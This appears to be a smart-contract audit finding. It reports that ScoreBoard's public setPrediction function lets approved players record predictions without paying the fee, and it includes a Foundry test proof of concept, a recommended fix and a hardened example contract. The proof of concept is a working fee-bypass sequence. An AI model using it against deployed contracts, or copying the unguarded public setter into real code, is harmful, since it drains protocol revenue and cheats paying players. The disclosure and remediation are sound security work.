Submission Details
Severity: high
Valid

The public visibility of setPrediction() allows any player to set a prediction without paying the prediction fee

Summary

The setPrediction function in ScoreBoard is declared public, so any registered player can call it directly instead of going through the fee-collecting path. This lets a player record a prediction without ever paying the prediction fee.

Vulnerability Details

Because setPrediction is public, nothing stops a registered (and approved) player from calling scoreBoard.setPrediction(player, matchNumber, result) from their own account. The prediction fee is only charged on the intended entry point, so a direct call bypasses it entirely: the prediction is stored, and the player's balance is untouched apart from the registration fee. The POC below demonstrates exactly that sequence.

POC

    function test_playersCanPredictWithoutPaying() public {
        // stranger registers by paying the 0.04 ether registration fee
        vm.startPrank(stranger);
        vm.deal(stranger, 1 ether);
        thePredicter.register{value: 0.04 ether}();
        vm.stopPrank();

        // organizer approves the new player
        vm.startPrank(organizer);
        thePredicter.approvePlayer(stranger);
        vm.stopPrank();

        // stranger records a prediction directly on ScoreBoard, bypassing the prediction fee
        vm.startPrank(stranger);
        scoreBoard.setPrediction(stranger, 1, ScoreBoard.Result.Draw);
        vm.stopPrank();

        // only the registration fee was spent; no prediction fee was paid
        assertEq(stranger.balance, 0.96 ether);
    }

Impact

This oversight can lead to a loss of protocol revenue and undermines the integrity of the game: players can take part in the prediction round without contributing the prediction fee that funds the reward pool, which makes the system unfair to players who pay and unreliable as a whole.

Tools Used

Manual

Recommendations

    // Change the visibility so that setPrediction cannot be called directly by players
    function setPrediction(
        address player,
        uint256 matchNumber,
        Result result
    ) internal {
        // existing body unchanged
    }
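The hardened version below is an added example, not the audited project's code: it reconstructs minimal ScoreBoard and ThePredicter contracts, and the PREDICTION_FEE value, the enum members other than Draw, and the approvePlayer/makePrediction flow are assumptions. Since the POC calls scoreBoard and thePredicter as two separate contracts, an internal setPrediction would not be reachable from ThePredicter, so this example restricts the caller to the ThePredicter address instead, which achieves the same goal: a prediction can only be recorded through the fee-paying path.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Hypothetical minimal reconstruction for illustration, not the audited contracts.
contract ScoreBoard {
    enum Result { Pending, First, Draw, Second } // only Draw appears in the report

    address public immutable thePredicter; // the only contract allowed to record predictions
    mapping(address => mapping(uint256 => Result)) public predictions;

    error OnlyThePredicter();

    constructor(address _thePredicter) {
        thePredicter = _thePredicter;
    }

    // Hardened: still externally visible, but rejects every caller except ThePredicter,
    // so a player can no longer bypass the fee by calling ScoreBoard directly.
    function setPrediction(address player, uint256 matchNumber, Result result) public {
        if (msg.sender != thePredicter) revert OnlyThePredicter();
        predictions[player][matchNumber] = result;
    }
}

contract ThePredicter {
    uint256 public constant PREDICTION_FEE = 0.0001 ether; // assumed value
    ScoreBoard public immutable scoreBoard;
    address public immutable organizer;
    mapping(address => bool) public approved;

    error NotOrganizer();
    error NotApproved();
    error IncorrectFee();

    constructor() {
        organizer = msg.sender;
        scoreBoard = new ScoreBoard(address(this)); // bind the board to this contract
    }

    function approvePlayer(address player) external {
        if (msg.sender != organizer) revert NotOrganizer();
        approved[player] = true;
    }

    // The single fee-paying entry point: the fee check and the board update are inseparable.
    function makePrediction(uint256 matchNumber, ScoreBoard.Result result) external payable {
        if (!approved[msg.sender]) revert NotApproved();
        if (msg.value != PREDICTION_FEE) revert IncorrectFee();
        scoreBoard.setPrediction(msg.sender, matchNumber, result);
    }
}
```

With this change the report's POC reverts with OnlyThePredicter at the direct scoreBoard.setPrediction call, and the only way to store a prediction is makePrediction with exactly PREDICTION_FEE attached.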

Updates

Lead Judging Commences

NightHawK Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation to Players' predictions.
